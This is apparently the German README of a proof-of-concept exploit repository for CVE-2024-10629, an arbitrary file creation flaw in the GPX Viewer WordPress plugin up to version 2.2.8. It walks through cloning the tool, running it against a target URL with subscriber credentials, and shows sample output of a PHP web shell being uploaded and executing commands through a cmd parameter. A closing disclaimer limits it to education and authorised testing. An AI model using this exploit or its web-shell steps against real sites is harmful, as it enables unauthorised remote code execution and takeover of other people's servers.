
GPX Viewer <= 2.2.8 - Authentifiziert (Abonnent+) Beliebige Dateierstellung
Dieses Repository enthält einen Proof-of-Concept-Exploit für das GPX-Viewer-Plugin für WordPress, das anfällig für die Erstellung beliebiger Dateien (CVE-2024-10629) ist. Die Schwachstelle erlaubt authentifizierten Angreifern mit Subscriber-Zugriff und höher, beliebige Dateien auf dem Server der betroffenen Website zu erstellen, was möglicherweise zu Remote Code Execution führt.
Das GPX-Viewer-Plugin für WordPress ist anfällig für die Erstellung beliebiger Dateien, da eine fehlende Berechtigungsprüfung und Dateityp-Validierung in der Funktion gpxv_file_upload() in allen Versionen bis einschließlich 2.2.8 vorliegt. Dadurch können authentifizierte Angreifer mit Subscriber-Zugriff und höher beliebige Dateien auf dem Server der betroffenen Website erstellen, was Remote Code Execution ermöglichen kann.
requests-BibliothekKlonen Sie das Repository:
git clone https://github.com/Nxploited/CVE-2024-10629/
cd CVE-2024-10629
Installieren Sie die erforderliche Bibliothek:
pip install requests
Führen Sie den Exploit aus:
python exploit.py -u <target_url> -un <username> -p <password>
Ersetzen Sie <target_url>, <username> und <password> durch die entsprechenden Werte.
python CVE-2024-10629.py -u http://example.com/wordpress -un subscriber -p subscriber_password
ls) aus.[+] WordPress plugin version: 2.2.8
[+] Vulnerable version detected. Proceeding with exploitation...
[+] Logged in successfully.
[+] Shell uploaded. Checking shell...
[+] Shell uploaded successfully.
[+] Shell URL: http://example.com/wp-content/uploads/gpx/uncategorized/nxploit_exploit.php
[+] Command output:
http://example.com/wp-content/uploads/gpx/uncategorized/nxploit_exploit.php?cmd=ls
index.php
wp-admin
wp-content
wp-includes
...
ls = Dateien anzeigenuname -a = Systeminformationen anzeigenDieser Exploit ist ausschließlich für Bildungszwecke und autorisierte Tests gedacht. Die unbefugte Nutzung dieses Exploits gegen Systeme, die Ihnen nicht gehören oder für die Sie keine ausdrückliche Genehmigung zum Testen haben, ist illegal und unethisch. Die Autoren und Mitwirkenden dieses Repositorys sind nicht für Missbrauch oder Schäden verantwortlich, die durch diesen Exploit verursacht werden.
Von: Khaled Alenazi (Nxploit)